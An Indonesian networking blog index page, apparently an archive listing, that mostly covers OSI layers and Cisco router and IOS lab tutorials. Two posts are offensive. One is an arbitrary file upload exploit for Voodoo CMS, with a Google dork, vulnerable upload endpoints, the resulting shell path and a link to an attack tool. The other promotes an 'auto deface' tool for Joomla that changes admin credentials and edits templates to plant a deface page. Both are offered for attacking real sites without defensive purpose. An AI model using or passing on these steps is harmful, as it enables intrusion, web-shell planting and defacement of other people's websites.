Home All posts

Minggu, 20 September 2015

OSI Layer 6 (Presentation Layer)

Artikel sebelumnya : OSI Layer 7 (Application Layer)
Presentation Layer
Sesuai dengan namanya "Presentation"/"presnet" = menyajikan . Layer ini berfungsi untuk menyajikan data kepada layer Application. Selain itu Layer Presentation berfungsi bagian penerjemah, pemberian coding, dan fungsi konversi.

Secara umum komputer kita dikonfigurasi untuk menerima data, dan kemudian sistem mengubahnya kembali, untuk membaca data yang sebenarnya (misalnya : EBCDIC ke ASCII). Dengan memberikan layanan penerjemah, layer Presentation memastikan bahwa data yang ditransfer dari Layer Application dari satu sisi, dapat dibaca oleh layer Application dari host lain.

OSI memiliki standar protokol bagaimana data standar harus diformat. Tugas-tugas compression, decompression, encription, dan decription ditangani oleh layer Presentation. Beberapa standar aplikasi terlibat dalam multimedia. Berikut contoh pelayanan untuk mengarahkan graphic dan visual image pada layer ini :
  • PICT
  • TIFF
  • JPEG
  • MIDI
  • MPEG
  • and QuickTime
Semoga memberi pemahaman tambahan mengenai Layer Presentation.





Read more

Jumat, 18 September 2015

OSI Layer 7 (Application Layer)

Application Layer
Layer ini merupakan layer/lapisan yang mana pengguna (end user) berkomunikasi, menggunakan aplikasi komputer berbasis Network (jaringan). Layer ini bertanggungjawab untuk identifikasi dan establishing (id: mendirikan) ketersediaan pengguna yang berkomunikasi, dan mengatur sumber daya supaya cukup untuk komunikasi tersebut.

Meskipun sebagian aplikasi hanya menggunakan resource desktop saja (seperti: Adobe Photoshop, Corel, dll) tetapi banyak juga aplikasi yang membutuhkan resource jaringan (seperti: Aplikasi game online, Mozilla Firefox (browsing), Teamviewer (remote), dsb) kita pasi membutuhkan jaringan untuk menjalankan aplikasi tersebut. Apalagi zaman sekarang, banyak aplikasi yang membutuhkan jaringan.

Aplikasi (Protokol) yang berbasis Network dan berada di layer ini contohnya:
  • WWW (HTTP, HTTPS)
  • Email Gateway (SMTP, X.400)
  • Electronic Data Interchange (EDI)
  • File Transfer (FTP), dan aplikasi yang membutuhkan media jaringan untuk bertukar data lainya.
Begitulah sedikit pembahasan "review" tentang layer Application, semoga membuat anda lebih mengerti lagi tentang BAB OSI.

Read more

Senin, 14 September 2015

Study Lab 1-3 : Identifikasi Cisco Router and Switch IOS







Study Lab 1-3 : Identifikasi Cisco Router and Switch IOS

Pada lab ini kita akan mengidentifikasi Cisco Internetwork Operating System (Cisco IOS), mengetahui Cisco IOS "Version" dan "Feature Sets" yang berjalan di sebuah device router anda sangatlah penting untuk perencanaan dan penggunaan fitur yang nanti anda diperlukan.
"Feature Sets" di Cisco seperti pemahaman kita mengenai distribusi pada windows, ada Home Basic, Home Edition, Home Premium, hingga Ultimate - Enterprise, nah di Cisco IOS dikenal dengan nama "Feature Sets". Masing-masing Feature Set mempunyai harga yang berbeda-beda. Beberapa Feature Sets mengandung kesamaan dengan Feature Sets yang lain. Dan kita akan mempelajari kesamaanya nanti pada lab selanjutnya.

Tujuan Lab ini adalah : Mengindentifikasi "Version" dan "Feature Sets" Pada Device Cisco Yang Sedang Berjalan/Running

Cara Identifikasi Version dan Feature Sets Cisco IOS ada dua cara:
a. Memeriksa pada saat device Router/Switch sedang boot Process sebelum kita menekan "n" pada (System Configuration Dialog). Gambar Version dan Feature Sets seperti ini:
Cisco IOS ini menggunakan IOS Version 12.3 (25) Hardware Series 3600.

b. Mengecek via Command Line di Privileged mode (Router#) dengan perintah:
Router#show version

: Ini adalah nama image file yang sedang berjalan di device kita. Nama image file ini sangat membantu kita untuk mengidentifikasi Version dan Feature Set Cisco IOS.


Dibawah ini merupakan table secara umum sebelum berdirinya nama image file yang telah terkompresi menjadi image file seperti diatas.

Image Letter
Feature Sets
I
IP
Y
IP on 1700 Series Platforms
S
IP Plus
S6
IP Plus – No ATM
S7
IP Plus – No Voice
J
Enterprise
O
IOS Firewall/Intrusion Detection
K
Cryptorgaphy/IPSEC/SSH
K8
56Bit DES Encryption (Weak Cryptography)
K9
3DES/AES Encryption (Strong Cryptography)
X
H323
G
Services Selection Gateway (SSG)
C
Remote Access Server or Packet Data Serving Node (PDSN)
B
Apple Talk
N
Novel IP/IPX
V
Vox
R
IBM
U
Unlawful Intercept
P
Service Provider
Telco
Telecommunications Feature Set
Boot
Boot Image (Used on high end routers/switches)

Sebagai contoh : flash:c3620-ik9o3s7-mz.123-25.bin
Sekarang kita coba identifikasi Feature Set nya:
(i = IP) (k9=Encryption "Strong Cryptography") (o3 = IOS Firewall/Intrusion Detection) (s7 = IP Plus – No Voice)

Memory Location dan Compression Format
Image Letter
IOS Boot Location
f
The image executes from Flash memory.
m
The image executes from RAM.
r
The image executes from ROM
l
The image is relocatable.
z
The image is compressed using ZIP format.
x
The image is compressed using MZIP format.
w
The image is compressed using STAC format.

Contoh diatas jika diidentifikasi ialah dieksekusi menggunakan RAM dan diformat menggunakan ZIP format.

// Sejak tahun 2006, Cisco memperkenalkan penamaan konvensi Feature Set baru. Penamaan konvensi baru ini dimulai pada versi 12.3 dan telah diimplementasi (Feature Set) pada versi 12.4.

Bagan penamaan konvensi baru Feature Set Router Cisco IOS, dimulai pada image IOS versi 12.3T dan versi setelahnya:
Tabel penamaan konvensi Feature Set Router Cisco IOS baru:
Feature Set
Description
Base
Entry level image (IP Base, Enterprise Base)
Services
addition of IP Telephony Service, MPLS, Voice over IP, Voice over Frame Relay and ATM (Included in SP Services, Enterprise Services)
Advanced
Addition of VPN, Cisco IOS Firewall, 3DES encryption, SSH, Cisco IOS IPSec and Intrusion Detection Systems (IDS) (Advanced Security, Advanced IP Services)
Enterprise
Addition of multi-protocols, including IBM, IPX, AppleTalk (Enterprise Base, Enterprise Services)

Selain Router, Switch juga mempunyai penamaan konvensi Feature Sets baru, penamaanya tidak jauh berbeda (hampir sama) dengan Router, berikut bagan untuk penamaan konvensi Feature Set Switch:
Feature Set Router maupun Switch Cisco IOS baru:
Router
c2800nm-adventerprisek9-mz.124-21.bin  
c2800nm-ipbase-mz.124-21.bin

Switch
c3750-advipservicesk9-mz.122-44.SE.bin  
c3750-ipservicesk9-mz.122-44.SE.bin  
c3750-ipbase-mz.122-44.SE.bin

Deskripsi:

1). IP Base : Dikenal sebagai Standard Multilayer Image (SMI) dari Cisco Catalyst 3550 Series Switches dibekali dengan : Advanced Quality of Service, Rate Limiting, ACL's, dan Basic Static dan fungsi routing RIP.

2). IP Services : Dikenal sebagai Enhanced Multilayer Image (EMI) di Cisco Catalyst 3550 Series Switches memiliki fitur yang lebih kaya dan bisa dibilang se-kelas Enterprise fungsi routingnya, memiliki hardware-base IP Unicast dan IP Multicast routing serta Policy Base Routing (PBR).

3). Advanced IP Services :  Tidak tersedia pra-instalasi licency. Baru tersedia setelah upgrade licency. Jenis ini mempunyai fitur IPv6 Routing dan IPv6 ACL's.

4). Enterprise Services & Advanced Enterprise Services : adalah "cream of the crop". File imagesnya mencakup kesemua fitur yang tersedia untuk platform, juga licency nya yang paling mahal dibanding yang lain. Licency ini hanya didukung pada sebagian swich modular, seperti: Catalyst 4500, 4900, 6500, dsb.

Berikut contoh Switch yang bisa anda beli yang licency nya sudah terbundle bersama platform:
>C3560-24PS-S = Cisco 3560 Series 24 Ports PoE with Standard Image (IP Base)
>C3750-48TS-E = Cisco 3750 Series 48 Port Non-PoE with Enhanced Image (IP Services)

NB: Cisco Catalyst 2960 Series mempunyai model licency yang berbeda, oleh karena itu switch ini menjadi ketetapan OSI Layer 2. Switch Catalyst seri 2960  hampir mirip Swich Catalyst seri 2950 mempunyai fitur yang terpisah antara Standard Image dan Enhanced Image dan sekarang telah mempunyai penamaan baru yaitu LAN LITE dan LAN BASE. Fitur baru ini mempunyai perbedaan yang drastis termasuk QoS, Ethernet Gigabyte Support, RPS, Rapid Spanning Tree, Link State Tracking, perangkat tambahan 802.1x, DHCP Snooping, dan banyak lagi fitur-fiturnya, silahkan kunjungi di website Cisco untuk mencari rincian penjelasanya.

Cisco IOS Version 15.0 dirilis tahun 2009 dengan mainline baru, kita akan melihat penggunaan image Universal nya. Feature Set nya tidak berubah tetapi sekarang menggunakan Image Universal baru. Image Feature Set harus dilicency menggunakan licency yang tersimpan di NVRAM. Setelah boot IOS, device akan membaca licency ini dan mengaktifkan fitur-fitur yang telah ditentukan dalam izin-izin yang mana sesuai licency yang anda beli.

Setiap licency Cisco satu pasang / sesuai dengan nomor Seri Platform, jadi licency nya tidak akan swapable. Itulah security licency Cisco memang sudah tidak diragukan lagi.

Cisco juga menggunakan teknologi ini 3560E dan 3750E Switches. Contoh IOS Images nya seperti:
>c3560e-universalk9-mz.122-50.SE2.bin  
>c3750e-universalk9-mz.122-50.SE2.bin  
>c3900-universalk9-mz.150-1M.bin



Read more

Minggu, 13 September 2015

Study Lab 1-2 : Konek ke Device Cisco via Console


Study Lab 1-2 : Konek ke Device Cisco via Console Cable

Core Knowledge
Bab ini membahas tentang cara terhubung ke perangkat Cisco dengan kabel Console (DB9 to RJ45). Jadi, jika kita mempunyai perangkat Cisco router/switch baru untuk melakukan konfigurasi dasar itu menggunakan kabel console DB9 yang terhubung ke komputer via USB. 
Setelah terhubung device keduanya (Router Cisco/Switch dengan PC) baru konfigurasi menggunakan CLI (Command Line Interface) untuk konfig biasanya menggunakan software Putty dan bisa juga menggunakan software Windows HyperTerminal bawaan Windows XP/Vista, tetapi jika anda menggunakan Windows 7/8 silahkan download aplikasinya sendiri. 
Selain software tersebut, ada juga aplikasi terminal emulator "SecureCRT" aplikasi ini dibuat oleh VanDyke. SecureCRT mempunyai kelebihan dibanding dengan aplikasi lainya, tetapi aplikasi ini berbayar.

Lab Objective
Rekomended untuk menyelesaikan lab ini kita dianjurkan menggunakan device real Cisco Router maupun Switch.
Step by step konek device Cisco Router:
a. Hubungkan PC ke Router/Switch Cisco menggunakan kabel console DB9

b. Buka software Putty dan konek ke Router/Switch menggunakan Connection type "Serial", Serial line = COM1(default) / COM port dan set speed=9600 bps (default speed putty and Cisco)

c. Setelah mengatur Connection type "Serial" dan Serial line = COM1 klik Open pada software putty lalu hidupkan device Cisco dan lihat proses boot up nya.


d. Setelah selesai boot up nya. Pada Setup Configuration Dialog tekan "n" pada keyboard untuk no. Asumsinya disini adalah NVRAM sudah terhapus jadi kita tekan "n".

e. Pada "Press RETURN to Get Started" tekan "Enter" pada Keyboard, setelah itu kita telah masuk ke "User mode" Cisco ditandai dengan "Router>"



Read more

Study Lab 1-1 : Identifikasi Router Cisco

cisco







Study Lab-1 : Identifikasi Router Cisco

Berikut adalah identifikasi macam-macam Router Cisco:

A. Cisco 2500 Series Routers
Cisco router seri 2500 terdiri dari seri 2501-2525. NB: Tambahan untuk seri 2509 dan 2511 ada 2 jenis, yang pertama only 2509 dan 2511 dan yang satu lagi 2509-RJ dan 2511-RJ.

B. Cisco 1600 Series Routers
Cisco router seri 1600 terdiri dari seri 1601-1605.

C. Cisco 3600 Series Routers
Cisco router seri 3600 ini terdiri dari: 3620, 3631-CO, 3640, 3660, 3661-CO, 3662.

D. Cisco 2600 & 2600XM Series Routers
Cisco router seri 2600 & 2600XM ini terdiri dari: 2610, 2611, 2612, 2613, 2620, 2621, 2650, 2651, 2610XM, 2611XM, 2620XM, 2621XM, 2650XM, 2651XM, dan 2691.


E. Cisco 1700 Series Routers
Cisco router seri 1700 ini terdiri dari: 1701, 1710, 1711, 1712, 1720, 1721, 1750, 1751, dan 1760.

F. Cisco 3700 Series Routers
Cisco router seri 3700 ini terdiri dari: 3725 dan 3745.

G. Cisco 1800 Series Routers
Cisco router seri 1800 ini terdiri dari: 1801, 1802, 1803, 1805, 1811, 1812, 1841, dan 1861.

H. Cisco 2800 Series Routers
Cisco router seri 2800 ini terdiri dari: 2801, 2811, 2821, dan 2851.

I. Cisco 3800 Series Routers
Cisco router seri 3800 ini terdiri dari: 3825 dan 3845.

Diatas saya hanya menyebutkan sebagian macam-macam Cisco Series Routers, untuk lebih jelasnya mengenai komponen, spesifikasi, dan aksesoris silahkan kunjungi Free CCNA Work Book.
Dan untuk melihat Produk Cisco Router secara lengkap silahkan dilihat di Cisco.com

Sebenarnya untuk real implementasi kita telah diberikan deskripsi sesuai kebutuhan kita.
Berikut tipe kebutuhan untuk real implementasi Cisco Router:

1. For Application  Optimization
a. Cisco vWAAS (virtual Wide Area Application Services)
b. Cisco WAAS (Wide Area Application Services) Express
c. Cisco WAAS (Wide Area Application Services) Software

2. Branch Routers
a. Cisco 4000 Series Integrated Services Routers
b. Cisco 3900 Series Integrated Services Routers
c. Cisco 3800 Series Integrated Services Routers
d. Cisco 2900 Series Integrated Services Routers
e. Cisco 2800 Series Integrated Services Routers
f. Cisco 1900 Series Integrated Services Routers
g. Cisco 800 Series Routers

3. Cloud Connectors
a. Cisco Unified Survivable Remote Site Telephony
b. Cisco WebEx Cloud Connected Audio

4. Data Center Interconnect Platforms
a. Cisco 7600 Series Routers
b. Cisco 7200 Series Routers
c. Cisco ASR 1000 Series Aggregation Services Routers
d. Cisco Carrier Routing System
e. Cisco Catalyst 6500 Series Switches
f. Cisco Nexus 7000 Series Switches

5. Industrial Routers
a. Cisco 2000 Series Connected Grid Routers
b. Cisco 1000 Series Connected Grid Routers
c. Cisco 900 Series Industrial Routers
d. Cisco 800 Series Industrial Integrated Services Routers
e. Cisco 500 Series WPAN Industrial Routers

6. Mobile Internet Routers
a. Cisco 5900 Series Embedded Services Routers
b. Cisco MWR 2900 Series Mobile Wireless Routers
c. Cisco MWR 1900 Mobile Wireless Routers

7. Service Provider Core Routers
a. Cisco Carrier Routing System
b. Cisco Network Convergence System 6000 Series Routers

8. Service Provider Edge Routers
a. Cisco 12000 Series Routers
b. Cisco 7600 Series Routers
c. Cisco 7500 Series Routers
d. Cisco 7300 Series Routers
e. Cisco 7200 Series Routers
f. Cisco ASR 9000 Series Aggregation Services Routers
g. Cisco ASR 1000 Series Aggregation Services Routers
h. Cisco ASR 920 Series Aggregation Services Routers
i. Cisco ASR 901 Series Aggregation Services Routers
j. Cisco ASR 901S Series Aggregation Services Routers
k. Cisco ASR 900 Series Aggregation Services Routers
l. Cisco XR 12000 Series Router

9. Service Provider Infrastructure Software
a. Cisco MATE Collector
b. Cisco MATE Design
c. Cisco MATE Live
d. Cisco WAN Automation Engine (WAE)

10. Small Bussiness Routers
a. Cisco 2900 Series Integrated Services Routers
b. Cisco 1900 Series Integrated Services Routers
c. Cisco 800 Series Routers
d. Cisco Small Business RV Series Routers

11. Virtual Routers
Cisco Cloud Services Router 1000V Series

12. WAN Aggregation and Internet Edge Routers
a. Cisco 7600 Series Routers
b. Cisco 7500 Series Routers
c. Cisco 7300 Series Routers
d. Cisco 7200 Series Routers
e. Cisco ASR 1000 Series Aggregation Services Routers
f. Cisco ASR 1000 Series Route Processor (RP1)
g. Cisco Catalyst 6500 Series Switches




Read more

Voodoo CMS Arbitrary File Upload Xploit

########################################
Date Published : 12/09/2015
Exploit Author : Mr. Error 404 | IndoXploit Coders Team
Tested on : Windows XP
#########################################

Google Dork : intext:"Diseño y Desarrollo PVS Interactive"
and Use ur brain :p
___________________________________________________



Affected URL : 
-www.target.com//voodoo-admin/uploader.php ( post: qqfile)
-www.target.com/voodoo-admin/upload.php ( post: Filedata)
-www.target.com//uploader.php (post: qqfile)
OR
-www.target.com//[PATH_CMS]//voodoo-admin/uploader.php ( post: qqfile)
-www.target.com//[PATH_CMS]/voodoo-admin/upload.php ( post: Filedata)
-www.target.com//[PATH_CMS]//uploader.php (post: qqfile)

Shell Akses: - target/voodoo-admin/files_tmp/[angka_random].php

Tools 0day Xploit => http://indoxploit.org/tools/?tools=vdocms
Input target : http://www.target.com/

Join : https://www.facebook.com/groups/indoxploitpublic/
Read more

auto edit user in joomla and auto deface v.2

"auto edit user in joomla and auto deface v.2"

cocok buat yg maenan jumping atau config..
jadi lu ngk usah capek capek nyelem ke database untuk ganti u\p admin.
terus login di sitenya untuk ngedeface...
karena fungsi itu udh ada di tool ini..

kelebihannya apa gan dibanding yg v.1 ? (v.1 http://indoxploit.blogspot.co.id/2015/09/auto-edit-user-in-joomla-deface.html)


kelebihannya klo di v.1 kan cuma ada 1 path untuk mengganti templatenya yaitu,
/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D

klo di v.2 ada 2 path
/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D

dan

/administrator/index.php?option=com_templates&task=source.edit&id=NTAzOmVycm9yLnBocA%3D%3D


kenapa ada 2 path gan ?
itu path yg kedua cuma alternatif kalo di path 1 ngk bisa..
jadi kalo path 1 ngk bisa (login sukses, tapi ngk bisa ganti template) maka akan lanjut ke path 2..

tapi kalo path 2 ngk bisa juga, ya terpaksa login dan ganti template manual..



bahan - bahan:
simpen 1 folder..
hacked.php <= script deface ada kata2 "hacked".
http://pastebin.com/raw.php?i=mrS1deGV <= simpan dgn ekstensi .php








Read more

Sabtu, 12 September 2015

Start with Cisco Packet Tracer

(Cisco Packet Tracer) merupakan sebuah simulator alat-alat jaringan khususnya produk (Cisco). Software ini cocok digunakan untuk simulasi jaringan, jadi untuk simulasi jaringan dasar orang tidak perlu menggunakan perangkat yang asli, menggunakan software ini saya rasa sudah cukup lengkap dan bagus digunakan untuk lembaga pendidikan (jaringan). Silahkan kunjungi Packet Tracer Network 
Disitu sudah tersedia "Free Lab Tutorials" sebelum mengikuti Ujian CCNP dan CCNA.
Study Rekomended: CCNA Routing and Switching and can be download Ebook CCNA Lab Guide Nixtrain 1st Full Version.

Yang belum punya Aplikasi CPT silahkan didownload disini.

Semoga membantu...
Read more
Langganan: Postingan (Atom)